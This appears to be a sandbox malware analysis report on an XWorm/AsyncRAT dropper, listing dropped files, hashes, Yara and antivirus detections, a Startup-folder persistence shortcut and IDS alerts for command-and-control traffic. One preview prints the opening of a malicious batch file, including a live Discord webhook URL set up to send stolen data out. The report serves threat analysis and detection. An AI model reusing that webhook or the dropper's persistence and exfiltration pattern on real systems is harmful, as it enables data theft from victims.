SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfofce13.nt1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzu1ni1q.zm4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m2b0zhd3.4va.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4fizebf.qme.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwdndmom.xqn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs5egc2n.n1q.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rswkkyym.ndb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sidfxgxk.c32.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0e0nbys.z1y.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uriv1ypk.uz4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxfym1hi.skl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbmgpf2b.4i1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnk

Download File

Process:	C:\Users\user\adawsfaefasfasfg.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Dec 6 20:46:47 2024, mtime=Fri Dec 6 20:46:47 2024, atime=Fri Dec 6 20:46:47 2024, length=43520, window=hide
Category:	dropped
Size (bytes):	761
Entropy (8bit):	5.017691496783147
Encrypted:	false
SSDEEP:	12:89Ncg4oRS70tChveedY//uaDLwcDI4H6jAsaqwNHcllCfHICiveymV:8MdMbZXtUqGAsaqwjfILpm
MD5:	30557632F1E5F405E049B9BF7D81649A
SHA1:	9691C64775A3CBAEEE757C95C42CA07DB32D0ED5
SHA-256:	8CE5BC03E67F2522566168E6DA8FA84C0BE8FAA7C133627676D06733702E2127
SHA-512:	248A8A1BBA99062BACEA2BE988D3BC1DAF4F2917BB7873FB258AC8EA49DF1704102688023B707DEC73531BAEC71330F62C1C39E65B34A061CDCE4FA73BEBE3D7
Malicious:	false
Preview:	L..................F.... .....Y(H....Y(H....Y(H..........................t.:..DG..Yr?.D..U..k0.&...&.......bBDj...dEu.(H.....Y(H......t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.Y............................=...A.p.p.D.a.t.a...B.V.1......Y....Roaming.@......EWsG.Y................................R.o.a.m.i.n.g.....`.2......Y. .SYSTEN~1..H......Y..Y.....((.....................?..S.y.s.t.e.n. .U.s.e.r.......X...............-.......W..................C:\Users\user\AppData\Roaming\Systen User........\.....\.....\.....\.....\.S.y.s.t.e.n. .U.s.e.r.`.......X.......364339...........hT..CrF.f4... .........,...E...hT..CrF.f4... .........,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Systen User

Download File

Process:	C:\Users\user\adawsfaefasfasfg.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	5.573723719197455
Encrypted:	false
SSDEEP:	768:S/ecdw4rtLx9rOu3Wm46F5PG9cNZ66vOwhc3Emjy:S/ecd5BdJWuFI9cZ66vOwy9W
MD5:	190010C187189B92E49A0ED05F6DDC88
SHA1:	9B144541973B7DB5B12BEC70EDAEF58A8769C4B3
SHA-256:	C0F48BF2F29B0BC6A2D83316327B101FABF9B1D2341749D2264EDCA7BBC0DD46
SHA-512:	6FE1E3A6896BD4C89705A5F96613E53319A1845517708D22230CB55C5184831A82D0D17DFD24106DBED79860412E22403268DEEF488B8174CA49EAF1E04D9334
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Systen User, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O"Sg............................~.... ........@.. ....................................@.................................$...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H.......La...]............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\PIN CRACKER V2.bat

Download File

Process:	C:\Users\user\Desktop\ozgpPwVAu1.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	7305
Entropy (8bit):	5.313456752501657
Encrypted:	false
SSDEEP:	192:qDxqudX5OMo+1PY5+2f0tf8w12f02OI12f0uw12f0j:ArX5OMo+doJQ8wAdOIA7wAG
MD5:	8D9DF9F485F51AC617832650A0D075AC
SHA1:	151B2C621AF3D6DEEF6EF93BEA703221D7C21632
SHA-256:	6ED99CC4AFD8F9309D4DBAC2E440E7AA1622A35C520BD74C65D4B5BA12DD75B4
SHA-512:	D0FB568F1A0A5ACC8728A44E364297326E6C0E0CDF35D70CF42CFBED529511A4CE7ED583562A4532CCA4B4EB2941EFE94C987135E292CCA277BC5F02B3A5A324
Malicious:	true
Preview:	::[Bat To Exe Converter]..::..::YAwzoRdxOk+EWAnk..::fBw5plQjdG8=..::YAwzuBVtJxjWCl3EqQJgSA==..::ZR4luwNxJguZRRnk..::Yhs/ulQjdF+5..::cxAkpRVqdFKZSDk=..::cBs/ulQjdF+5..::ZR41oxFsdFKZSDk=..::eBoioBt6dFKZSDk=..::cRo6pxp7LAbNWATEpCI=..::egkzugNsPRvcWATEpCI=..::dAsiuh18IRvcCxnZtBJQ..::cRYluBh/LU+EWAnk..::YxY4rhs+aU+JeA==..::cxY6rQJ7JhzQF1fEqQJQ..::ZQ05rAF9IBncCkqN+0xwdVs0..::ZQ05rAF9IAHYFVzEqQJQ..::eg0/rx1wNQPfEVWB+kM9LVsJDGQ=..::fBEirQZwNQPfEVWB+kM9LVsJDGQ=..::cRolqwZ3JBvQF1fEqQJQ..::dhA7uBVwLU+EWDk=..::YQ03rBFzNR3SWATElA==..::dhAmsQZ3MwfNWATElA==..::ZQ0/vhVqMQ3MEVWAtB9wSA==..::Zg8zqx1/OA3MEVWAtB9wSA==..::dhA7pRFwIByZRRnk..::Zh4grVQjdCyDJGyX8VAjFBhbSA2MAE+1EbsQ5+n//NaVrU8RW/pxfZfeug==..::YB416Ek+ZG8=..::..::..::978f952a14a936cc963da21a135fa983..@echo off..title Nexus Tools..color F..chcp 65001....setlocal enabledelayedexpansion....:: Define the webhook URL here..set "WEBHOOK_URL=https://discordapp.com/api/webhooks/1309170780696870912/8yNfzeRdjxyYLYxaut1-j0gdfkndb6ZneH0LI8EP6wjxbAcxt3Le1IqSe

C:\Users\user\adawsfaefasfasfg.exe

Download File

Process:	C:\Users\user\Desktop\ozgpPwVAu1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	43520
Entropy (8bit):	5.573723719197455
Encrypted:	false
SSDEEP:	768:S/ecdw4rtLx9rOu3Wm46F5PG9cNZ66vOwhc3Emjy:S/ecd5BdJWuFI9cZ66vOwy9W
MD5:	190010C187189B92E49A0ED05F6DDC88
SHA1:	9B144541973B7DB5B12BEC70EDAEF58A8769C4B3
SHA-256:	C0F48BF2F29B0BC6A2D83316327B101FABF9B1D2341749D2264EDCA7BBC0DD46
SHA-512:	6FE1E3A6896BD4C89705A5F96613E53319A1845517708D22230CB55C5184831A82D0D17DFD24106DBED79860412E22403268DEEF488B8174CA49EAF1E04D9334
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\adawsfaefasfasfg.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O"Sg............................~.... ........@.. ....................................@.................................$...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................`.......H.......La...]............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

C:\Users\user\wasdwasfwasfs.exe

Download File

Process:	C:\Users\user\Desktop\ozgpPwVAu1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.550217090046014
Encrypted:	false
SSDEEP:	768:pnR3k+5jVuXBRiniBuuAMz+9vCF5Pr9jCgQ67OMhl3ID0L:pR3k9RRin/yFF9G367OMnYw
MD5:	34452F83F7D58EC91D2CEDF4B24C9764
SHA1:	3255103025C5F55B0AE23EC0F7CC6B1CE7A88A3C
SHA-256:	D1D2C305066627967017D7F513550DD64E2F4675A14412D8C6017957F52D4DEA
SHA-512:	F21179EA716618C94E76DAC7BD08E420A330EF4F8FDA8D51EE2BE06D4E6B524596221E8F96297BCA3696BBA07167295F7D2BD1D65A1C39A5C3FAADC5B58D8148
Malicious:	true
Yara Hits:	Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\wasdwasfwasfs.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...."Sg................................. ........@.. ....................................@....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......<\...Y............................................................(......(.....s.........s.........s.........s............0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0..........~....o.....+....0............(....(.....+......0...........(.....+....0...............(.....+....0...........(.....+....0................-.(...+.+.+...+...0...........................(.....0.. .......~.........-.(...+.....~.....+....(.....0..

\Device\Null

Download File

Process:	C:\Windows\System32\where.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	4.5232314287976205
Encrypted:	false
SSDEEP:	3:oXeNy:oXeNy
MD5:	B6E4FC39D5CB35C4C14CDCD7E65A7818
SHA1:	94C0DA5BF10382AA19C84A3A6E9A2DEEBA809196
SHA-256:	3B33F5B322B2D9449E8B63A1C6220EFD1F0D12E9A476007FABB15A5FEAA18799
SHA-512:	4A3C061D3D504CB34D5CFED681DB2B5D295206AE64FB287DA47DCA0B1F50C1028627F692F002BB051F1987260CC5CBB7CB25CD0339ED09FF36E0CFE8315DE646
Malicious:	false
Preview:	C:\Windows\System32\curl.exe..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.934328678955829
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ozgpPwVAu1.exe
File size:	193'024 bytes
MD5:	784bd7f714cf13880f47c591e7aed7fa
SHA1:	66c44c447a49221b5e61e9552012db6420f561e9
SHA256:	622b720c1733ce7dfd2e1d5f11f9c0c8bd93f11fcae3341a5db5b8a03cca7968
SHA512:	4122a72f472c0fa80cf4ecbba662e2b4d3b08fcfd10d9ac74187b8319804cf7f007a2f68a3990be2d679f1d77e6619212b0f2658aa8d703b3601ea8617033c01
SSDEEP:	3072:BkBU+HnNucPkNf0TOX7aeCBm9Fi6AbC6pqS631IuCs09GC4i520zvZgJPxli5U:kHNJPifUU+ezFnALp+38sAGPi5PzRgJ2
TLSH:	A014F12489E74D7AE7E75AF67E92F670A930CFD2204F420EB488F98CA457B4C54E051B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...q"Sg.....................Z........... ........@.. .......................@............@................................

File Icon


Icon Hash:	86b1697be9c9ccd8

Static PE Info

General

Entrypoint:	0x41b4ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67532271 [Fri Dec 6 16:12:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1b494	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0x1574a	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x32000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x194f4	0x19600	ad97917883ae58cd179aabbe1ad0b33d	False	0.9281769550492611	data	7.927667118084018	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1c000	0x1574a	0x15800	c9f48a42bdd4398b9093fecfb95d1b21	False	0.9910519622093024	data	7.955976303596955	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x32000	0xc	0x200	ffbee573c3e2b9a1971cde3aa1d5809b	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x1c130	0x151a5	PNG image data, 256 x 256, 8-bit/color RGB, non-interlaced	1.0004164883094044
RT_GROUP_ICON	0x312d8	0x14	Targa image data - Map 65536 x 20901 x 1	0.9
RT_VERSION	0x312ec	0x274	data	0.4601910828025478
RT_MANIFEST	0x31560	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-06T22:45:53.124203+0100	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.9	49825	149.154.167.220	443	TCP
2024-12-06T22:46:18.119385+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.9	49853	147.185.221.22	12886	TCP
2024-12-06T22:46:18.826308+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	147.185.221.22	12886	192.168.2.9	49853	TCP
